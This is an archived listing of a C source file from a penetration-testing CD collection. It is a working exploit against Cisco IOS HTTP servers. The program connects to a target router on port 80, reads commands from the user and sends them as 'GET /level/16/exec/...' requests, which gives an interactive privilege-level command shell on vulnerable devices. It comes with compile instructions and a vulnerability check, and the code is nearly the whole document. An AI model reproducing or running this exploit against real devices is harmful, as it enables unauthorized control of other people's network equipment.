home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / cisco / cisco-http.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.6 KB  |  72 lines
  1. /* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
  2.  * to compile:
  3.  * bash# gcc -o cisco cisco.c 
  4.  */
  5.  
  6. #include <stdio.h>
  7. #include <netdb.h>
  8. #include <sys/types.h>
  9. #include <sys/socket.h>
  10. #include <netinet/in.h>
  11.  
  12. #define HTTP_PORT 80
  13. #define PROMPT "\ncisco$ "
  14.  
  15. int usage (char *progname) {
  16.         printf ("Usage:\n\t%s server\n", progname);
  17.         exit(-1);
  18. }                                                               
  19.         
  20. int main (int argc, char *argv[]) {
  21.         struct hostent *he;
  22.         struct sockaddr_in sin;
  23.         int sck, i;
  24.         char command[256], buffer[512];
  25.         if (argc < 2)
  26.                 usage(argv[0]);
  27.         if ((he = gethostbyname(argv[1])) == NULL) {
  28.                 perror("host()");
  29.                 exit(-1);
  30.         }
  31.         sin.sin_family = AF_INET;
  32.         sin.sin_port = htons(HTTP_PORT);
  33.         sin.sin_addr = *((struct in_addr *)he->h_addr);
  34.         while (1) {
  35.                 if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
  36.                         perror("socket()");
  37.                         exit(-1);
  38.                 }
  39.                 if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
  40.                         perror ("connect()");
  41.                         exit(-1);
  42.                 }
  43.                 printf (PROMPT);
  44.                 fgets (command, 256, stdin);
  45.                 if (strlen(command) == 1) 
  46.                         break;
  47.                 for (i=0;i<strlen(command);i++) {
  48.                         if (command[i] == ' ')
  49.                                 command[i] = '/';
  50.                 }
  51.                 snprintf (buffer, sizeof(buffer), 
  52.                                                         "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); 
  53.                 write (sck, buffer, strlen(buffer));
  54.                 memset (buffer, 0, sizeof(buffer));
  55.                 while ((read (sck, buffer, sizeof(buffer))) != 0) {
  56.                         if ((strstr(buffer, "CR</A>")) != 0) {
  57.                                 printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
  58.                                 memset (buffer, 0, sizeof(buffer));
  59.                                 break;
  60.                         } else if ((strstr(buffer, "Unauthorized")) != 0) {
  61.                                 printf ("Server not vulnerable\n");
  62.                                 exit(-1);
  63.                         } else {
  64.                                 printf ("%s", buffer);
  65.                                 memset (buffer, 0, sizeof(buffer));
  66.                         }
  67.                  }
  68.         }
  69.         printf ("Thanks...\n");
  70.         exit(0);
  71. }
  72.